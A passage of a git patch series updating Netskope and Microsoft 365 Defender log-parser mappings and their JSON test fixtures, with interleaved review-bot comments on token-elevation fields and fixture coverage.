:0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}",
 "event": {
- "action": "block",
+ "action": "Browse",
 "category": [
 "network"
 ],
@@ -23,6 +23,9 @@
 ]
 },
 "@timestamp": "2024-11-14T09:01:32Z",
+ "action": {
+ "name": "block"
+ },
 "destination": {
 "address": "1.2.3.4",
 "bytes": 0,
diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json
index d0d9ed304..412ece514 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_log.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_log.json
@@ -17,6 +17,9 @@
 ]
 },
 "@timestamp": "2022-12-21T15:52:00Z",
+ "action": {
+ "name": "Allow"
+ },
 "cloud": {
 "instance": {
 "id": "Example"
diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json
index b05f61a9d..314e7d7e1 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_upload.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json
@@ -23,6 +23,9 @@
 ]
 },
 "@timestamp": "2024-11-14T09:04:46Z",
+ "action": {
+ "name": "Allow"
+ },
 "destination": {
 "address": "1.2.3.4",
 "bytes": 0,
diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json
index 4c435b860..bb5831a9c 100644
--- a/Netskope/netskope_events/tests/test_user_alert.json
+++ b/Netskope/netskope_events/tests/test_user_alert.json
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": 
\"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": 
\"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n",
 "event": {
- "action": "useralert",
+ "action": "Share",
 "category": [
 "network"
 ],
@@ -17,6 +17,9 @@
 ]
 },
 "@timestamp": "2022-12-21T14:52:01Z",
+ "action": {
+ "name": "useralert"
+ },
 "destination": {
 "address": "108.128.91.183",
 "bytes": 0,
From 9264ef70512e299c783d05b43afb38dacd4c3431 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com>
Date: Thu, 28 Nov 2024 10:25:08 +0100
Subject: [PATCH 100/150] Update Microsoft/microsoft-365-defender/ingest/parser.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Sébastien Quioc
---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index fc32171cd..d212bdb11 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -267,7 +267,8 @@ stages:
 action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
 action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
 action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+ action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
 action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
 action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
 action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
From a4b94af6afa920ba08482254408c406c0ef90db6 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 28 Nov 2024 11:57:27 +0100
Subject: [PATCH 101/150] Correction of overwrited test file
---
 .../tests/test_device_process_events_2.json | 114 ++++++------------
 1 file changed, 36 insertions(+), 78 deletions(-)
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
index cab75fb0a..9b0327128 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
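Review bot: Splitting the `or` fallback is the right call, since the old line reported the child's `ProcessTokenElevation` under the parent's key whenever `InitiatingProcessTokenElevation` was absent; what still needs confirming is how the template stage treats the literal string "None" that the Linux event in the next commit carries for both fields, because that fixture's expected output keeps neither property, which suggests a real source value is discarded rather than a null. Style-wise, `action.properties.ProcessTokenElevation` now sits in the middle of the `InitiatingProcess*` mappings; grouping it with the other `Process*` properties (the removed expected output further down lists `ProcessIntegrityLevel` and `ProcessVersionInfo*`, so those mappings presumably live elsewhere in this stage) would keep the stanza readable. The enclosing stage starts and ends outside the hunk.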
@@ -1,6 +1,6 @@ { "input": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", 
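Review bot: The replacement input swaps the Windows event for a Linux one in which `InitiatingProcessTokenElevation` and `ProcessTokenElevation` are both the string "None", and the expected hunk further down (`@@ -19,115 +19,73 @@`, which runs past the end of this chunk) keeps only `InitiatingProcessLogonId` and `LogonId` under `action.properties`, so the token-elevation split made in the preceding parser commit is no longer exercised by this file. If dropping a literal "None" is intended, a fixture that keeps a non-"None" elevation (the removed Windows event had `TokenElevationTypeDefault` for both fields) would retain that coverage. The same observation applies to the `"expected"` hunk at `@@ -9,7 +9,7 @@` below, which carries the identical message. Separately, the new event reports `ProcessId` and `InitiatingProcessId` as the same value (423627) with `InitiatingProcessParentId` 0, so `process.pid` and `process.parent.pid` come out equal in the expected output; presumably that is what the Linux sensor emitted, but it is worth confirming it is not a fixture artefact.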
@@ -9,7 +9,7 @@ } }, "expected": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
